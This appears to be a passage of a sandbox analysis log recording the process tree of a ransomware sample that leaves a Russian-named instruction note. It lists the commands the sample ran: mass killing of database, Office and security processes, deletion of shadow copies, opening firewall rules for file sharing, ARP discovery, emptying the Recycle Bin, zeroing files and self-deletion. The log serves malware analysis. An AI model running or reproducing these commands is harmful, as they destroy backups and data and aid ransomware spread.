C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:528
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
PID:1900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:340
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1788
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1172
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:532
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1736
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:552
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:1552
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt2⤵PID:1036
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1072
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:616
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1852
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\emk21h33.exe2⤵PID:1548
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2039446261-1127730794-1402692226-18580627261930710932-1136011885-724646992-884479599"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:896